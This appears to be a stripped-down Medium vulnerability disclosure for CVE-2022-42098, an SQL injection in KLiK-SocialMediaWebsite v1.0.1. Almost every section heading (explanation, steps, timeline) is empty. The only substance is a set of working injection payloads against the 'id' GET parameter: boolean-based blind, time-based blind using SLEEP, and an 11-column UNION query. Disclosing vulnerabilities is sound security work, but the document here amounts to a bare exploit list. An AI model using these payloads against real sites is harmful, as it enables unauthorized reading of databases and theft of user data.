[CVE-2022–42098]KLiK SQL INJECTION

KLiK-SocialMediaWebsite version v1.0.1

Vulnerability Explanation:

Attack Vectors:

Affected:

Payload :

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=27 AND 3227=3227
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=27 AND (SELECT 3046 FROM (SELECT(SLEEP(5)))barN)
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=-2373 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71787a7171,0x6d67676474624545784f564265735871415865575a4f72697053686d724768624969514c70754459,0x717a707071),NULL,NULL,NULL,NULL,NULL,NULL#

Tested on:

Steps to attack:

Discoverer:

Disclosure Timeline:

--

--

You get the best out of others when you give the best of yourself

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
GrimTheRipper

You get the best out of others when you give the best of yourself